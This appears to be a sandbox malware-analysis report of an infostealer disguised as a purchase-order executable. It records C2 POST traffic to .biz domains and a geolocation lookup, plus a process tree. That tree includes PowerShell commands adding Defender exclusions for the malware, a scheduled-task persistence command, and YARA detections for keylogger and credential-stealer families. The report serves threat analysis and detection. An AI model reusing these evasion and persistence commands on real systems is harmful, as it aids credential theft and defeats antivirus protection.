                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    37192.168.2.44992718.246.231.120807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:23.814193964 CET355OUTPOST /kwsxhlpkribwfg HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: jpskm.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:23.814219952 CET778OUTData Raw: 92 2f fa 21 c4 86 72 83 fe 02 00 00 21 b2 21 41 a6 5e 0c ba 9c 32 0d 4d 80 c0 a2 16 4c de e1 b0 f8 02 e7 94 14 ba b1 32 f9 aa fd 1c 43 1c 78 fc 0b 37 91 66 5c 82 b1 ce e7 37 c6 ca 96 6a ae 73 67 f2 15 d0 93 ef 60 b6 de 1d 14 92 9d f5 b4 6b db 42
                                                                                                                                                                                                                                    Data Ascii: /!r!!A^2ML2Cx7f\7jsg`kB&KJ|Q8 [LpF_5TSwXD//x{R4QUx4B_9K|&)tBN,}xB9Tw5HiYMd$@
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:24.525293112 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:06:24 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: btst=c4858ad0712d5d6bfc9c218b3f8692b1|8.46.123.189|1735632384|1735632384|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    38192.168.2.44993854.244.188.177807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:25.105933905 CET356OUTPOST /lutwptrdxtxh HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: lrxdmhrr.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:25.106216908 CET778OUTData Raw: 66 65 b6 87 bc 53 5c 8a fe 02 00 00 1f 92 57 9d 37 2d 35 68 72 4a 8b f7 5c 6d f9 45 1d 9d c0 33 8d 95 4d 50 2e 3c 7a 94 bc 3f de ce fe 91 92 fd fe de eb 99 ee 89 40 58 0a 9f 40 2a bf d1 21 b9 f0 66 f0 af 01 28 35 53 4c 51 90 1c 81 2e 27 fc 75 46
                                                                                                                                                                                                                                    Data Ascii: feS\W7-5hrJ\mE3MP.<z?@X@*!f(5SLQ.'uFg5ukP*y":q(M?qJc/+B?ywO2}RG}kES&w^4 .X-QHPXuM=z.ng


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    39192.168.2.45005054.244.188.177807304C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:53.694452047 CET355OUTPOST /fncvigkebkn HTTP/1.1
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Host: lrxdmhrr.biz
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                    Dec 31, 2024 09:06:53.694477081 CET778OUTData Raw: 5a c8 6f d5 02 10 13 b3 fe 02 00 00 1a 4c e2 86 e0 dd 1a a0 a5 78 67 f8 1f 2b db de 89 cf c5 c8 d3 a2 77 cc 03 60 ad 11 41 29 d4 ee 2e 13 79 03 e4 61 60 d6 d6 b7 b9 53 29 01 7a ef 40 8a 44 d7 19 f7 99 d5 fa 49 61 06 1d 2a bd ad 1e a0 ea 2a dc 9f
                                                                                                                                                                                                                                    Data Ascii: ZoLxg+w`A).ya`S)z@DIa**5Cg/'c-rlr4jCU>%F6]Sv/*,N}F7jcr0NJ6V2Lr>/`qCq:h_6\i+;bhaug


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    0192.168.2.449752188.114.96.34432124C:\Users\user\AppData\Local\Temp\Microsofts.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-31 08:05:21 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    2024-12-31 08:05:21 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:05:21 GMT
                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                    Content-Length: 362
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Age: 947110
                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                    cf-cache-status: HIT
                                                                                                                                                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F8o68%2F4D6jg0gBNRT6wiSRtJXv1TwBAFmfmae0RcvI7LqAI6aXgKuliGvCj2EatPLErTaftoLtcxkPCktSuO%2Fr11wzQFuVqnoWxPfTlD7piCIuAY3HY1IH1cwGcPNOgTDGm%2BZSZB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8fa8c3995ac24283-EWR
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1613&rtt_var=624&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1725768&cwnd=242&unsent_bytes=0&cid=7c01be5b485a7a8e&ts=188&x=0"
                                                                                                                                                                                                                                    2024-12-31 08:05:21 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                    Start time:03:05:00
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"
                                                                                                                                                                                                                                    Imagebase:0x980000
                                                                                                                                                                                                                                    File size:1'442'304 bytes
                                                                                                                                                                                                                                    MD5 hash:C12317B003EBC503C85BAB87C2104120
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                    Start time:03:05:03
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"
                                                                                                                                                                                                                                    Imagebase:0x710000
                                                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                    Start time:03:05:03
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                    Start time:03:05:03
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zeXKjViL.exe"
                                                                                                                                                                                                                                    Imagebase:0x710000
                                                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                    Start time:03:05:03
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                    Start time:03:05:03
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp"
                                                                                                                                                                                                                                    Imagebase:0x710000
                                                                                                                                                                                                                                    File size:187'904 bytes
                                                                                                                                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                    Start time:03:05:03
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                    Start time:03:05:03
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"
                                                                                                                                                                                                                                    Imagebase:0x930000
                                                                                                                                                                                                                                    File size:1'442'304 bytes
                                                                                                                                                                                                                                    MD5 hash:C12317B003EBC503C85BAB87C2104120
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.1769417350.0000000003700000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.1793222374.00000000049A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.1758588393.0000000003533000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.1798563262.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                    Start time:03:05:04
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:1'290'240 bytes
                                                                                                                                                                                                                                    MD5 hash:72BA8A03C7C6EFEED1AD022BBE6E4CAE
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                    Start time:03:05:04
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\zeXKjViL.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\zeXKjViL.exe
                                                                                                                                                                                                                                    Imagebase:0xba0000
                                                                                                                                                                                                                                    File size:1'442'304 bytes
                                                                                                                                                                                                                                    MD5 hash:C12317B003EBC503C85BAB87C2104120
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                    Start time:03:05:04
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                                                    File size:1'225'728 bytes
                                                                                                                                                                                                                                    MD5 hash:73A5E8C4C9FBA1AD14C07468F41BFB78
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                                    Start time:03:05:04
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                                                    File size:138'056 bytes
                                                                                                                                                                                                                                    MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                                    Start time:03:05:04
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                                                    File size:174'408 bytes
                                                                                                                                                                                                                                    MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                                    Start time:03:05:04
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                                                    File size:154'952 bytes
                                                                                                                                                                                                                                    MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                                    Start time:03:05:04
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                                                    File size:1'348'608 bytes
                                                                                                                                                                                                                                    MD5 hash:1B7D1BBDA98AC1FED8DBC0B99926E47C
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                                                    Start time:03:05:05
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                                                                                                                                    Imagebase:0x9e0000
                                                                                                                                                                                                                                    File size:70'656 bytes
                                                                                                                                                                                                                                    MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                                    Start time:03:05:06
                                                                                                                                                                                                                                    Start date:31/12/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Microsofts.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Microsofts.exe"
                                                                                                                                                                                                                                    Imagebase:0x200000
                                                                                                                                                                                                                                    File size:98'816 bytes
                                                                                                                                                                                                                                    MD5 hash:F6B8018A27BCDBAA35778849B586D31B
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, Author: unknown
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.2962626553.0000000002633000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
